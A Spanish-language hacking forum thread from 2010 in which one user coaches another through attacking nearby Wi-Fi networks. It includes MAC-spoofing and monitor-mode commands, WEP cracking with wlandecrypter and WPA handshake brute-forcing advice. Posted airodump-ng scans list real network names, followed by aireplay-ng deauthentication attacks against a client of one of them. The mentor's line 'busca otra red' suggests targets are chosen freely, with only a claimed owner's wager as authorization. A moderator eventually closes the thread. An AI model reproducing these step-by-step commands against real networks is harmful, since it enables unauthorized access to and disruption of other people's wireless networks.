elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux
| | | |-+  una solucion porfa a eh0 wireless no extensión ...en windows
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] Ir Abajo Respuesta Imprimir
Autor Tema: una solucion porfa a eh0 wireless no extensión ...en windows  (Leído 39,240 veces)
xv0


Desconectado Desconectado

Mensajes: 1.026



Ver Perfil
Re: una solucion porfa a eh0 wireless no extensión ...en windows
« Respuesta #100 en: 29 Mayo 2010, 21:45 pm »

lealesdibua tio tienes problemas en todos los pasos ;D

Aver no te cierran la pagina si cumples las normas, chimoc te dice eso por que estas mostrando mac de otra gente y puede aver problemas digo yo.
Eso que me enviaste no izo nada esta fatal, si macchanger no te deja y arimon-ng te da problemas lo haces de otro modo, en realidad se puede cambiar la mac y entrar en modo monitor sin airmon-ng y macchanger.
Lo primero que te desconectes del wifi, sabes hacerlo? cuando estas desconectado de internet abres una terminal y pones esto:
Código:
sudo ifconfig wlan0 down
ahora cambiamos la mac con ifconfig
Código:
sudo ifconfig wlan0 hw ether 00:11:22:33:44:55
ahora le decimos que nos ponga wlan0 modo monitor, ojo ahora no abra interfazes virtuales como mon0 ni nada de eso sera wlan0
Código:
sudo iwconfig wlan0 mode monitor
y ya levantamos el interfaz
Código:
sudo ifconfig wlan0 up
y miras si esta modo monitor
Código:
iwconfig
y ya
Código:
sudo airodump-ng wlan0
tendria que capturar y con la mac cambiado digo yo, como eso no funcione nose que decir ya.

Un saludo
En línea

lealesdibua

Desconectado Desconectado

Mensajes: 174



Ver Perfil
Re: una solucion porfa a eh0 wireless no extensión ...en windows
« Respuesta #101 en: 2 Junio 2010, 18:16 pm »

hola me da cosa decir esto pero wlan_64 ya no esta se fue de bacaciones o algo

la que hay es pdk es wpa y tengo que usar diccionario e estado informandome estos dias de como usarlo ya lo tengo instalado

y tengo que estudiar un poco todo eso porque no es nada facil ¿¿ademas con lo torpe que soy??

Cpu2 gracias por toda la ayuda que me prestaste me se ya todos los pasos tuyos de memoria

y a sido de gran ayuda saludos
En línea

BUENO un dia lei que beber era malo y deje de beber
otro dia lei que fumar era malo y deje de fumar ..
otro dia lei que follar era malo y entonces
deje de leer
xv0


Desconectado Desconectado

Mensajes: 1.026



Ver Perfil
Re: una solucion porfa a eh0 wireless no extensión ...en windows
« Respuesta #102 en: 2 Junio 2010, 18:42 pm »

Buenas
hola me da cosa decir esto pero wlan_64 ya no esta se fue de bacaciones o algo
No posa na hombre abra apagado el router, busca otra red y ya esta, solo auditalas.
la que hay es pdk es wpa y tengo que usar diccionario e estado informandome estos dias de como usarlo ya lo tengo instalado
Bueno, la mejor forma que hay de sacar una WPA es por fuerza bruta y necesitas una tarjeta grafica pepino, yo no lo e podido hacer por eso, si lo haces con el procesador tardaras muchos muchos muchos años, si quieres pasame el nombre de la red y aver si te puedo ayudar, si es una Tele2 a lo mejor la sacas pero si es una red que el tio a puesto la contraseña inventada ya ni intentes sacarla por que no la sacaras.
y tengo que estudiar un poco todo eso porque no es nada facil ¿¿ademas con lo torpe que soy??

Cpu2 gracias por toda la ayuda que me prestaste me se ya todos los pasos tuyos de memoria

y a sido de gran ayuda saludos
E pensado hacer un manual de todo esto.
Se me olvida va, si aun tienes las capturas, puedes sacarle la clave con un programa que se llama wlandecrypter, mira
Citar
E0:91:53:_______  WLAN_                   WEP (120  IVs)
con 120 paquetes las sacas

Venga un saludo
« Última modificación: 2 Junio 2010, 18:54 pm por cpu2 » En línea

lealesdibua

Desconectado Desconectado

Mensajes: 174



Ver Perfil
Re: una solucion porfa a eh0 wireless no extensión ...en windows
« Respuesta #103 en: 3 Junio 2010, 16:58 pm »

ya lo tengo instalo y listo para trabajar --esa red es sdk o psk hay que echarle cojones mean dicho
porque no sale asociada creo saludos te la  paso---¡¡¡¡ me conecte a una!! pero es debil
me dan 30 euros si consigo descifrarla el dueño de la red algo le a echo ¡¡¡queeee le damos cañaaa

no se usarlo wlandecrypter y me e trago muchos videos y leido pero no consigo saber el momento de usarlo

un saludo Cpu2 y si deberias hacer eso que dices porque todas las explicaciones que hay en la red son una *****

-------tu sabes tela de redes lo se porque estoy en todos los foros asta el moderador esta aprendiendo aqui---

saludos ;-)
En línea

BUENO un dia lei que beber era malo y deje de beber
otro dia lei que fumar era malo y deje de fumar ..
otro dia lei que follar era malo y entonces
deje de leer
xv0


Desconectado Desconectado

Mensajes: 1.026



Ver Perfil
Re: una solucion porfa a eh0 wireless no extensión ...en windows
« Respuesta #104 en: 3 Junio 2010, 17:24 pm »

Buenas, cuando bajas el wlandecrypter en el README viene una explicación de uso.
ya lo tengo instalo y listo para trabajar --esa red es sdk o psk hay que echarle cojones mean dicho
porque no sale asociada creo saludos te la  paso---¡¡¡¡ me conecte a una!! pero es debil
me dan 30 euros si consigo descifrarla el dueño de la red algo le a echo ¡¡¡queeee le damos cañaaa
Wa hay que echarle cojones y mucho mas, aki tengo un vecino que me reto a petarle la WPA, tengo capturado el handshake y cuando tenga mi GTX275 ya le intentare reventar, ati te da 30 euros ami me dijo que me invitaría a una mariscada  :laugh: ;-)
porque no sale asociada creo saludos te la  paso---¡¡¡¡ me conecte a una!! pero es debil
Tienes que esperar a que tenga un cliente, a que aiga un associado, en la WPA no puedes associarte con la falsa estilo 00:11:22:33:44:55, di le que coja el portatil y se baje la peli de avatar xD
un saludo Cpu2 y si deberias hacer eso que dices porque todas las explicaciones que hay en la red son una *****
Aver si me animo, y pasame el nombre de la red.

Un saludo
En línea

ChimoC
Por la libertad y contra el terrorismo
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.129


Paz, dignidad y justicia


Ver Perfil
Re: una solucion porfa a eh0 wireless no extensión ...en windows
« Respuesta #105 en: 3 Junio 2010, 19:00 pm »

-------tu sabes tela de redes lo se porque estoy en todos los foros asta el moderador esta aprendiendo aqui---

saludos ;-)


Buenas:

Que sepas que TODO lo que te están diciendo está ya en los posts y chinchetas y más que explicado en todo el foro. El problema es que tu lo quieres todo para ya...y hay que leer más, estudiar más y pasar muchas muchas horas.

Este post ya está desvariando muy mucho, ya que nada tiene que ver lo que te está explicando muy amablamente cpu2 con el título de tu post.

Un saludo y si tienes más dudas abre un nuevo post con otro título

ChimoC
En línea

lealesdibua

Desconectado Desconectado

Mensajes: 174



Ver Perfil
Re: una solucion porfa a eh0 wireless no extensión ...en windows
« Respuesta #106 en: 3 Junio 2010, 19:49 pm »

 CH 12 ][ Elapsed: 20 s ][ 2010-06-03 18:29                                   
                                                                               
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                               
 -----------------   -1        0       73    0 158  -1   WEP  WEP         <leng
 -----------------  -82       41        0    0   7  54 . WPA  TKIP   PSK  INSTA
 -----------------  -82       18        0    0   1  11   WEP  WEP         JADA
 -----------------  -88       15       10    0  11  54 . WEP  WEP         WLAN_
 -----------------  -88       10        0    0  13  54 . WPA  TKIP   PSK  ONO14
 -----------------  -91       10        0    0  11  54   WEP  WEP         Jazzt
 -----------------  -89       12        0    0   4  54 . OPN              XCUBE
 -----------------  -90       10        0    0  13  54 . WEP  WEP         ONO85
 -----------------  -94        2        0    0  11  54e. WEP  WEP         Pablo
                                                                               
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes     
                                                                               
 -----------------  00000000000000000  -85    0 - 1    152       89             
 -----------------  00000000000000000  -68    0 - 1      0        1             
 -----------------  00000000000000000  -75    0 -54      0       11             





 CH 10 ][ Elapsed: 2 mins ][ 2010-06-03 18:31                                         
                                                                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID           
                                                                                         
 -----------------   -1        0      193    0 158  -1   WEP  WEP         <length:  0>   
 -----------------  -82      234        0    0   7  54 . WPA  TKIP   PSK  INSTANET       
 -----------------  -84      103        6    0   1  11   WEP  WEP         JADA           
 -----------------  -88       87       26    0  11  54 . WEP  WEP         WLAN_E9         
 -----------------  -88       80        0    0  13  54 . WPA  TKIP   PSK  ONO1414         
 -----------------  -88       75        0    0   4  54 . OPN              XCUBE           
 -----------------  -88       77        0    0  11  54   WEP  WEP         Jazztel Wireless
 -----------------  -91       84        0    0  13  54 . WEP  WEP         ONO8585         
 -----------------  -91        5        0    0  11  54e. WEP  WEP         Pablo           
                                                                                         
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes               
                                                                                         
 -----------------  -----------------  -85    0 - 1    114      231                       
 -----------------  -----------------  -68    0 -11      0        3                       
 -----------------  -----------------  -77    0 -54      0       34                       
 (not associated)   -----------------    0    0 - 1      0       24                       
 (not associated)   -----------------  -90    0 - 2      0        1                       



 CH  5 ][ Elapsed: 20 mins ][ 2010-06-03 18:49                                         
                                                                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID         
                                                                                         
 -----------------   -1        0     1859    0 158  -1   WEP  WEP         <length:  0>   
 -----------------  -81      922      104    0   1  11   WEP  WEP         JADA           
 -----------------  -82     2091        0    0   7  54 . WPA  TKIP   PSK  INSTANET       
 -----------------  -85     1116      418    0  11  54 . WEP  WEP         WLAN_E9       
 -----------------  -85     1127        5    0   4  54 . OPN              XCUBE         
 -----------------  -88      628        0    0  13  54e. WPA  TKIP   PSK  ONO1414       
 -----------------  -89      690        0    0  13  54e. WEP  WEP         ONO8585       
 -----------------  -89      557        0    0  11  54   WEP  WEP         Jazztel Wireles
 -----------------   -1        0        0    0 108  -1                    <length:  0>   
                                                                                         
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes               
                                                                                         
 -----------------  -----------------  -85    0 -11    109     2441                       
 -----------------  -----------------  -69   11 - 1      0       51                       
 -----------------  -----------------  -69    0 - 5      0        6                       
 -----------------  -----------------  -79    0 - 1    841      685                       
 (not associated)   -----------------    0    0 - 1      0      192                       
 -----------------  -----------------  -93    0 - 1      0       14                       
^C
root@leal-laptop:/home/leal# airodump-ng -c 7 --bssid AAAAAAAAAAA -w INSTANET mon0



























 CH  7 ][ Elapsed: 30 mins ][ 2010-06-03 19:23                                         
                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID     
                                                                                         
 AAAAAAAAAAAAA       -79 100    17881       10    0   7  54 . WPA  TKIP   PSK  INSTANET   
                                                                                         
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes               
                                                                                         
^C
root@leal-laptop:/home/leal#

-----------------------------------------------------------------------------------------------------


2 consla




leal@leal-laptop:~$ sudo su
[sudo] password for leal:
root@leal-laptop:/home/leal# aireplay-ng -0 30 -a AAAAAAAAAAAAA -c BBBBBBBBBBBBB mon0
18:54:25  Waiting for beacon frame (BSSID: 00:22:3F:13:49:94) on channel 7
18:54:26  Sending 64 directed DeAuth. STMAC: [AAAAAAAAAAAAAAAAA] [ 0|54 ACKs]
18:54:26  Sending 64 directed DeAuth. STMAC: [AAAAAAAAAAAAAAAAA] [ 0|64 ACKs]
18:54:27  Sending 64 directed DeAuth. STMAC: [AAAAAAAAAAAAAAAAA] [ 0|63 ACKs]
18:54:27  Sending 64 directed DeAuth. STMAC: [AAAAAAAAAAAAAAAAA] [ 0|64 ACKs]
18:54:28  Sending 64 directed DeAuth. STMAC: [AAAAAAAAAAAAAAAAA] [ 0|38 ACKs]
18:54:28  Sending 64 directed DeAuth. STMAC: [AAAAAAAAAAAAAAAAA] [ 0|64 ACKs]


bueno llasabes como sigue y lo mal que acaba no puedo meterle el diccionario ¿¿¿por ahora???


un saludo Cpu2 por poquito verdad ------¡¡¡
En línea

BUENO un dia lei que beber era malo y deje de beber
otro dia lei que fumar era malo y deje de fumar ..
otro dia lei que follar era malo y entonces
deje de leer
ChimoC
Por la libertad y contra el terrorismo
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.129


Paz, dignidad y justicia


Ver Perfil
Re: una solucion porfa a eh0 wireless no extensión ...en windows
« Respuesta #107 en: 3 Junio 2010, 22:53 pm »

Buenas:

Post cerrado...ya que si no lo hago vas a seguir posteando en él (aunque ya te haya advertido que no lo hagas puesto que estas preguntando cosas que nada tienen que ver con el título)

ChimoC
En línea

Páginas: 1 2 3 4 5 6 7 8 9 10 [11] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Un consejo porfa problema con windows
Windows
Aliza1432 3 2,550 Último mensaje 9 Septiembre 2013, 04:33 am
por Banker25
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines